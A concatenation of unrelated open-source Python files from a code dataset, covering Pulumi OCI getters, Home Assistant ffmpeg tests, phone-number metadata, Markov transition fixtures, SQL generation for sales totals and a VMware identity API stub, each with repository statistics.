@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) Unique name that can be edited. The name should not contain any confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="monitorType")
def monitor_type(self) -> pulumi.Output[str]:
"""
Type of monitor.
"""
return pulumi.get(self, "monitor_type")
@property
@pulumi.getter(name="repeatIntervalInSeconds")
def repeat_interval_in_seconds(self) -> pulumi.Output[int]:
"""
(Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
"""
return pulumi.get(self, "repeat_interval_in_seconds")
@property
@pulumi.getter(name="scriptId")
def script_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
"""
return pulumi.get(self, "script_id")
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> pulumi.Output[str]:
"""
Name of the script.
"""
return pulumi.get(self, "script_name")
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> pulumi.Output[Sequence['outputs.MonitorScriptParameter']]:
"""
(Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
"""
return pulumi.get(self, "script_parameters")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
(Updatable) Enables or disables the monitor.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def target(self) -> pulumi.Output[str]:
"""
(Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
"""
return pulumi.get(self, "target")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
"""
return pulumi.get(self, "time_updated")
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> pulumi.Output[int]:
"""
(Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds for monitors. Also, timeoutInSeconds should be a multiple of 60. The monitor is allowed to run only for timeoutInSeconds and is terminated after that.
"""
return pulumi.get(self, "timeout_in_seconds")
@property
@pulumi.getter(name="vantagePointCount")
def vantage_point_count(self) -> pulumi.Output[int]:
"""
Number of vantage points where monitor is running.
"""
return pulumi.get(self, "vantage_point_count")
@property
@pulumi.getter(name="vantagePoints")
def vantage_points(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
return pulumi.get(self, "vantage_points")
| 57.279116 | 461 | 0.683365 | 6,796 | 57,050 | 5.508682 | 0.047969 | 0.06758 | 0.062425 | 0.036435 | 0.949435 | 0.937308 | 0.927398 | 0.914817 | 0.908166 | 0.892272 | 0 | 0.005601 | 0.217669 | 57,050 | 995 | 462 | 57.336683 | 0.833191 | 0.479001 | 0 | 0.760077 | 1 | 0 | 0.124274 | 0.032445 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165067 | false | 0.001919 | 0.013436 | 0 | 0.278311 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d29d090674fda2337853bf22ef7e869dbaae9203 | 62 | py | Python | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | 1 | 2020-08-18T08:03:44.000Z | 2020-08-18T08:03:44.000Z | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | null | null | null | src/core/currency/__init__.py | arnulfojr/money-manager | 8600f1ff258a89f5742ffad4d5f589fd1def5259 | [
"MIT"
] | null | null | null |
from models import Currency
from models import ExchangeRate
| 12.4 | 31 | 0.83871 | 8 | 62 | 6.5 | 0.625 | 0.384615 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 62 | 4 | 32 | 15.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d2b999d125595a54ea747fbc7cfbb94e4c48b200 | 3,444 | py | Python | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | null | null | null | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | 1 | 2017-03-10T22:17:06.000Z | 2017-03-10T22:17:06.000Z | tests/components/binary_sensor/test_ffmpeg.py | loraxx753/skynet | 86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543 | [
"Apache-2.0"
] | 1 | 2019-08-04T19:25:10.000Z | 2019-08-04T19:25:10.000Z | """The tests for Home Assistant ffmpeg binary sensor."""
from unittest.mock import patch
from homeassistant.bootstrap import setup_component
from homeassistant.util.async import run_callback_threadsafe
from tests.common import (
get_test_home_assistant, assert_setup_component, mock_coro)
class TestFFmpegNoiseSetup(object):
"""Test class for ffmpeg."""
def setup_method(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
'ffmpeg': {
'run_test': False,
},
'binary_sensor': {
'platform': 'ffmpeg_noise',
'input': 'testinputvideo',
},
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
@patch('haffmpeg.SensorNoise.open_sensor', return_value=mock_coro())
def test_setup_component_start(self, mock_start):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
entity = self.hass.data['ffmpeg'].entities[0]
self.hass.start()
assert mock_start.called
assert entity.state == 'off'
run_callback_threadsafe(
self.hass.loop, entity._async_callback, True).result()
assert entity.state == 'on'
class TestFFmpegMotionSetup(object):
"""Test class for ffmpeg."""
def setup_method(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.config = {
'ffmpeg': {
'run_test': False,
},
'binary_sensor': {
'platform': 'ffmpeg_motion',
'input': 'testinputvideo',
},
}
def teardown_method(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_component(self):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
@patch('haffmpeg.SensorMotion.open_sensor', return_value=mock_coro())
def test_setup_component_start(self, mock_start):
"""Setup ffmpeg component."""
with assert_setup_component(1, 'binary_sensor'):
setup_component(self.hass, 'binary_sensor', self.config)
assert self.hass.data['ffmpeg'].binary == 'ffmpeg'
assert len(self.hass.data['ffmpeg'].entities) == 1
entity = self.hass.data['ffmpeg'].entities[0]
self.hass.start()
assert mock_start.called
assert entity.state == 'off'
run_callback_threadsafe(
self.hass.loop, entity._async_callback, True).result()
assert entity.state == 'on'
| 32.8 | 73 | 0.614692 | 384 | 3,444 | 5.322917 | 0.192708 | 0.086106 | 0.058708 | 0.088063 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0.842466 | 0 | 0.00392 | 0.259292 | 3,444 | 104 | 74 | 33.115385 | 0.797334 | 0 | 0 | 0.753623 | 0 | 0 | 0.130521 | 0.021424 | 0 | 0 | 0 | 0 | 0.275362 | 0 | null | null | 0 | 0.057971 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d2e0106f810e2419cca45ede72c9cf4d31fc9978 | 1,901 | py | Python | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | 1 | 2015-01-31T01:17:14.000Z | 2015-01-31T01:17:14.000Z | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | null | null | null | python/tests/testdata/region_BY.py | ILMServices/python-phonenumbers | 317b0b128162b031e156b9de69ade9a5c8cf4844 | [
"Apache-2.0"
] | null | null | null | """Auto-generated file, do not edit by hand. BY metadata"""
from phonenumbers.phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_BY = PhoneMetadata(id='BY', country_code=375, international_prefix='810',
general_desc=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}'),
fixed_line=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}', example_number='112345'),
mobile=PhoneNumberDesc(national_number_pattern='[1-9]\\d{5}', possible_number_pattern='\\d{6}'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
national_prefix='8',
national_prefix_for_parsing='80?|99999',
number_format=[NumberFormat(pattern='(\\d{4})', format='\\1', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8 \\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})', format='\\1 \\2', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8\\1'),
NumberFormat(pattern='(\\d{3})(\\d{3})', format='\\1 \\2', leading_digits_pattern=['[1-8]'], national_prefix_formatting_rule='8 \\1')])
| 86.409091 | 143 | 0.757496 | 240 | 1,901 | 5.6625 | 0.275 | 0.229581 | 0.198676 | 0.317881 | 0.701987 | 0.701987 | 0.701987 | 0.701987 | 0.701987 | 0.298013 | 0 | 0.030664 | 0.073645 | 1,901 | 21 | 144 | 90.52381 | 0.741056 | 0.02788 | 0 | 0 | 1 | 0 | 0.10532 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d2f1379deb69a0df65e46bd9a394791093d83676 | 73 | py | Python | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | from src.constants import *
from src.constants.direction import Direction | 36.5 | 45 | 0.849315 | 10 | 73 | 6.2 | 0.5 | 0.225806 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09589 | 73 | 2 | 45 | 36.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
961efc9611f00a5c94e7d51e2726753c2f3406ba | 2,400 | py | Python | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 26 | 2020-08-28T00:48:20.000Z | 2022-02-27T22:10:53.000Z | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 3 | 2020-08-28T06:04:27.000Z | 2020-08-28T08:03:52.000Z | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 3 | 2020-08-28T10:38:42.000Z | 2021-02-27T16:07:52.000Z | import pytest
import numpy as np
@pytest.fixture
def simple_transition_matrix():
return np.array(
[
[
[1., 0., 0., 0., 0.],
[0.1, 0.9, 0., 0., 0.],
[0., 0.1, 0.9, 0., 0.],
[0., 0., 0.1, 0.9, 0.],
[0., 0., 0., 0.1, 0.9]
],
[
[0.4, 0.6, 0., 0., 0.],
[0.1, 0.3, 0.6, 0., 0.],
[0., 0.1, 0.3, 0.6, 0.],
[0., 0., 0.1, 0.3, 0.6],
[0., 0., 0., 0.1, 0.9]
]
]
)
@pytest.fixture
def large_transition_matrix():
return np.array(
[
[
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
],
[
[0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0, 0, 0],
[0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0],
[0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0],
[0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0],
[0, 0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25],
[0, 0, 0, 0, 0, 0, 0, 0.33, 0.33, 0.34],
[0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0.5],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
],
[
[0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0, 0, 0],
[0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0, 0],
[0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0],
[0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0],
[0, 0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0],
[0, 0, 0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2],
[0, 0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25],
[0, 0, 0, 0, 0, 0, 0, 0.33, 0.33, 0.34],
[0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0.5],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
]
]
)
| 34.782609 | 59 | 0.255417 | 467 | 2,400 | 1.304069 | 0.051392 | 0.765189 | 0.970443 | 1.057471 | 0.883415 | 0.883415 | 0.883415 | 0.881773 | 0.881773 | 0.881773 | 0 | 0.398839 | 0.4975 | 2,400 | 68 | 60 | 35.294118 | 0.106136 | 0 | 0 | 0.421875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | true | 0 | 0.03125 | 0.03125 | 0.09375 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
7da3a7a75e1d99bc6653a3e31ade8bfc8885043e | 115 | py | Python | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | from pettingzoo.classic.chess.test_chess import test_chess
def specific_env_tests():
test_chess.test_chess()
| 19.166667 | 58 | 0.808696 | 17 | 115 | 5.117647 | 0.588235 | 0.413793 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 59 | 23 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7dce1d6e31df3b9dd20fe291c8669349f89e53cf | 4,304 | py | Python | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 3 | 2015-02-25T19:44:43.000Z | 2020-12-18T05:49:09.000Z | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 1 | 2019-11-20T12:31:34.000Z | 2019-11-20T12:31:35.000Z | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 1 | 2020-06-07T06:25:19.000Z | 2020-06-07T06:25:19.000Z | async def get_sql(cte, params, company, conn, locations):
common = f"""
(
SELECT a.location_id, SUM(a.tran_tot) AS tran_tot FROM
(
SELECT b.location_id, a.tran_date, a.tran_tot,
ROW_NUMBER() OVER (PARTITION BY a.nsls_code_id, a.location_row_id,
a.function_row_id, a.source_code_id
ORDER BY a.tran_date DESC) row_num
FROM {company}.nsls_totals a
JOIN {company}.adm_locations b ON b.row_id = a.location_row_id
WHERE a.deleted_id = 0 AND a.tran_date <= dates.cl_date
) AS a
WHERE a.row_num = 1
GROUP BY a.location_id
) AS cl_bal
LEFT JOIN
(
SELECT a.location_id, SUM(a.tran_tot) AS tran_tot FROM
(
SELECT b.location_id, a.tran_date, a.tran_tot,
ROW_NUMBER() OVER (PARTITION BY a.nsls_code_id, a.location_row_id,
a.function_row_id, a.source_code_id
ORDER BY a.tran_date DESC) row_num
FROM {company}.nsls_totals a
JOIN {company}.adm_locations b ON b.row_id = a.location_row_id
WHERE a.deleted_id = 0 AND a.tran_date < dates.op_date
) AS a
WHERE a.row_num = 1
GROUP BY a.location_id
) AS op_bal
ON op_bal.location_id = cl_bal.location_id
"""
if conn.constants.servertype == 'sqlite3':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'''
COALESCE((SELECT SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) FROM {common}), 0) AS "{location} [REAL2]"
''' for location in locations) }
{', ' if locations else ''}
COALESCE((SELECT SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) FROM {common}), 0) AS "total [REAL2]"
FROM dates
ORDER BY dates.op_date
"""
elif conn.constants.servertype == 'pgsql':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'COALESCE(a.{location}, 0) AS "{location} [REAL2]"' for location in locations)}
{', ' if locations else ''}
COALESCE(a.total, 0) AS "total [REAL2]"
FROM dates
JOIN LATERAL
(SELECT
{', '.join(f'''
SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) AS {location}
''' for location in locations) }
{', ' if locations else ''}
SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) AS total
FROM {common}
) AS a
ON true
ORDER BY dates.op_date
"""
elif conn.constants.servertype == 'mssql':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'COALESCE(a.{location}, 0) AS "{location} [REAL2]"' for location in locations)}
{', ' if locations else ''}
COALESCE(a.total, 0) AS "total [REAL2]"
FROM dates
CROSS APPLY
(SELECT
{', '.join(f'''
SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) AS {location}
''' for location in locations) }
{', ' if locations else ''}
SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) AS total
FROM {common}
) AS a
ORDER BY dates.op_date
"""
fmt = f"{{:%d-%m}}/{{:%d-%m}} : {'{:>10.2f}' * len(locations)}{{:>12.2f}}"
return sql, params, fmt
| 44.371134 | 135 | 0.495586 | 538 | 4,304 | 3.77881 | 0.14684 | 0.061977 | 0.059026 | 0.064929 | 0.877521 | 0.867683 | 0.856862 | 0.856862 | 0.856862 | 0.812592 | 0 | 0.014493 | 0.390799 | 4,304 | 96 | 136 | 44.833333 | 0.76087 | 0 | 0 | 0.75 | 0 | 0.065217 | 0.92263 | 0.118262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.01087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7dec4cdc4587d213a03288dc4893a504f1f73e52 | 94,920 | py | Python | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.identity.
#---------------------------------------------------------------------------
"""
The ``com.vmware.vcenter.identity_client`` module provides classes to manage
VcIdentity.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Providers(VapiInterface):
"""
The ``Providers`` interface provides methods to list, read and modify
vCenter Server identity providers. This class was added in vSphere API
7.0.0.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.identity.providers'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ProvidersStub)
self._VAPI_OPERATION_IDS = {}
class ConfigType(Enum):
"""
The ``Providers.ConfigType`` class contains the possible types of vCenter
Server identity providers. This enumeration was added in vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
Oauth2 = None
"""
Config for OAuth2. This class attribute was added in vSphere API 7.0.0.
"""
Oidc = None
"""
Config for OIDC. This class attribute was added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`ConfigType` instance.
"""
Enum.__init__(string)
ConfigType._set_values([
ConfigType('Oauth2'),
ConfigType('Oidc'),
])
ConfigType._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.config_type',
ConfigType))
class IdmProtocol(Enum):
"""
The ``Providers.IdmProtocol`` class contains the possible types of
communication protocols to the identity management endpoints. This
enumeration was added in vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
REST = None
"""
REST protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
SCIM = None
"""
SCIM protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
LDAP = None
"""
LDAP protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`IdmProtocol` instance.
"""
Enum.__init__(string)
IdmProtocol._set_values([
IdmProtocol('REST'),
IdmProtocol('SCIM'),
IdmProtocol('LDAP'),
])
IdmProtocol._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.idm_protocol',
IdmProtocol))
class Oauth2AuthenticationMethod(Enum):
"""
The ``Providers.Oauth2AuthenticationMethod`` class contains the possible
types of OAuth2 authentication methods. This enumeration was added in
vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
CLIENT_SECRET_BASIC = None
"""
Clients that have received a client_secret value from the Authorization
Server, authenticate with the Authorization Server in accordance with
Section 3.2.1 of OAuth 2.0 [RFC6749] using the HTTP Basic authentication
scheme. This class attribute was added in vSphere API 7.0.0.
"""
CLIENT_SECRET_POST = None
"""
Clients that have received a client_secret value from the Authorization
